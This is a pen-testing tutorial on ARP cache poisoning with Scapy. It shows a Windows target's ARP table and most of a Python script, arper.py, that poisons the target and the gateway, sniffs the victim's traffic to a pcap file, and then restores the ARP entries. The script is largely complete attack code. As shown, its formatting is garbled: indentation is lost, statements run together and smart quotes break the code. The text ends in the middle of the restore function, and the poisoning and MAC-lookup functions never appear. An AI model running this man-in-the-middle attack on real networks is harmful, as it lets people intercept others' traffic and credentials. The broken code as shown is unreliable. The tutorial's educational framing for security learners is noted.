How to perform ARP Cache Poisoning with Scapy

 

ARP poisoning is one of the oldest yet most effective tricks in a hacker’s toolkit. Quite simply, we will convince a target machine that we have become its gateway, and we will also convince the gateway that in order to reach the target machine, all traffic has to go through us. Every computer on a network maintains an ARP cache that stores the most recent MAC addresses that match to IP addresses on the local network, and we are going to poison this cache with entries that we control to achieve this attack. Because the Address Resolution Protocol and ARP poisoning in general is covered in numerous other materials, I’ll leave it to you to do any necessary research to understand how this attack works at a lower level. Now that we know what we need to do, let’s put it into practice. When I tested this, I attacked a real Windows machine and used my Kali VM as my attacking machine. I have also tested this code against various mobile devices connected to a wireless access point and it worked great. The first thing we’ll do is check the ARP cache on the target Windows machine so we can see our attack in action later on. Examine the following to see how to inspect the ARP cache on your Windows VM.

C:\Users\Clare> ipconfig

Windows IP Configuration

Wireless LAN adapter

Wireless Network Connection:

Connection-specific DNS Suffix  . : gateway.pace.com

Link-local IPv6 Address . . . . . : fe80::34a0:48cd:579:a3d9%11

IPv4 Address. . . . . . . . . . . : 172.16.1.71

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 172.16.1.254

C:\Users\Clare> arp -a

Interface: 172.16.1.71 — 0xb

Internet Address      Physical Address         Type

172.16.1.254          3c-ea-4f-2b-41-f9        dynamic

172.16.1.255          ff-ff-ff-ff-ff-ff        static

224.0.0.22            01-00-5e-00-00-16        static

224.0.0.251           01-00-5e-00-00-fb        static

224.0.0.252           01-00-5e-00-00-fc        static

255.255.255.255       ff-ff-ff-ff-ff-ff        static

So now we can see that the gateway IP address  is at 172.16.1.254 and its associated ARP cache entry  has a MAC address of 3c-ea-4f-2b-41-f9. We will take note of this because we can view the ARP cache while the attack is ongoing and see that we have changed the gateway’s registered MAC address. Now that we know the gateway and our target IP address, let’s begin coding our ARP poisoning script. Open a new Python file, call it arper.py, and enter the following code:

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new  skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you.

from scapy.all import *

import os

import sys

import threading

import signal

interface = "en1"

target_ip = "172.16.1.71"

gateway_ip = "172.16.1.254"

packet_count = 1000

# set our interface conf.iface = interface
# turn off output

conf.verb = 0

print "[*] Setting up %s" % interface

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:

print "[!!!] Failed to get gateway MAC. Exiting."

sys.exit(0)

else:

print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)

target_mac = get_mac(target_ip)

if target_mac is None:

print "[!!!] Failed to get target MAC. Exiting."

sys.exit(0)

else:

print  "[*] Target %s is at %s" % (target_ip,target_mac)

# start poison thread

poison_thread = threading.Thread(target = poison_target, args = (gateway_ip, gateway_mac,target_ip,target_mac)) poison_thread.start()

try:

print "[*] Starting sniffer for %d packets" % packet_count

bpf_filter = "ip host %s" % target_ip

packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)

# write out the captured packets

wrpcap('arper.pcap',packets)

# restore the network                        restore_target(gateway_ip,gateway_mac,target_ip,target_mac)

except KeyboardInterrupt:

# restore the network     restore_target(gateway_ip,gateway_mac,target_ip,target_mac)

sys.exit(0)

This is the main setup portion of our attack. We start by resolving the gateway  and target IP  address’s corresponding MAC addresses using a function called get_mac that we’ll plumb in shortly. After we have accomplished that, we spin up a second thread to begin the actual ARP poisoning attack . In our main thread, we start up a sniffer  that will capture a preset amount of packets using a BPF filter to only capture traffic for our target IP address. When all of the packets have been captured, we write them out  to a PCAP file so that we can open them in Wireshark or use our upcoming image carving script against them. When the attack is finished, we call our restore_target function , which is responsible for putting the network back to the way it was before the ARP poisoning took place. Let’s add the supporting functions now by punching in the following code above our previous code block: def restore_target(gateway_ip,gateway_mac,target_ip,target_mac): # slightly different method using send print “[*] Restoring target…” ➊ send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=”ff:ff:ff:ff:ff:ff”,hwsrc=gateway_mac),count=5) send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=”ff:ff:ff:ff:ff:ff”,hwsrc=target_mac),count=5) # signals the main thread to exit